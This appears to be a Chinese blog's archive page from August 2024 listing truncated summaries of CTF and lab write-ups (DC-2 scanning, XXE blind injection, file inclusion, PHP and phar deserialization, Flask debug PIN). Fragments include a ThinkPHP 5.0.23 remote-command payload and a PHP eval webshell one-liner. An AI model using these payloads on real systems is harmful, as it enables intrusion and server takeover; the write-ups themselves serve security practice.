08 2024 档案
摘要:下载靶机dc-2 先找靶机 nmap -sV 10.204.11.0/24 先广泛的找一下 再细查一下 nmap -A -p- 10.204.11.3 开了个80端口又有一个ssh登陆端口 我们先查看一下 端口服务 发现无法访问解析失败我们可以配置/etc/hosts文件再主机配置C:\Window
阅读全文
摘要:打开题目是个登录框 这里是XXE盲注 boogipop师傅的盲注脚本 import requests import time url ='http://6562827c-cc7e-4a5e-818d-97f9064dfce0.node4.buuoj.cn:81/index.php' strs ='a
阅读全文
摘要:靶机下载 下载后直接用vmware打开即可 然后把靶机网络连接模式改为net,然后把攻击机也就是kail改为桥连或是net 然后打开靶机停留在下面这个状态 接下来你就可以开始渗透了 第一步:找到靶机 先扫一下网段(网段ifconfig看一下) nmap -sV 10.204.11.0/24 找到应该
阅读全文
摘要:打开题目 研究一圈没啥营养价值 下载源码 发现好东西 if (file_exists($page)) { require_once $page; }else{ require_once 'pages/error_page.php'; } 活的文件包含 我们直接利用 ?+config-create+/
阅读全文
摘要:对源码进行简单的分析 <?php // 检查 `hint` 请求参数是否等于指定的数组值 if ($_REQUEST['hint'] == ["your?", "mine!", "hint!!"]) { // 如果条件满足,设置响应内容类型为纯文本 header("Content-type: tex
阅读全文
摘要:下载附件 # -*- coding: utf-8 -*- import base64 import string import random from flask import * import jwcrypto.jwk as jwk import pickle from python_jwt im
阅读全文
摘要:胡乱输一些东西得到版本5.0.23 get: /index.php?s=captch post: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd 但是system被过滤了我们可以用passthru代替
阅读全文
摘要:进入后是一个文件上传但是这里并没有漏洞点 看cookie 得到源码 <?php highlight_file(__FILE__); error_reporting(0); class story{ private $user='admin'; public $pass; public $eating
阅读全文
摘要:首先进入后查看源码 进入class.php 看见unlike很明显是一个phar反序列化的利用 我们有两种选择 一 一句话木马 <?php class Flag{ public $cmd; } $a=new Flag(); $a->cmd="echo \"<?=@eval(\\\$_POST['a'
阅读全文
摘要:一个文件上传一个输入pin码一个文件列表 Flask 调试模式的风险 Flask 框架提供了调试模式,可以通过设置 app.debug = True 或 FLASK_ENV=development 来启用。启用调试模式后,Flask 会在代码更改时自动重载应用,并且会显示详细的错误信息,包括回溯(t
阅读全文
摘要:题目 <?php highlight_file(__FILE__); class Start{ public $errMsg; public function __destruct() { die($this->errMsg); } } class Pwn{ public $obj; public
阅读全文
浙公网安备 33010602011771号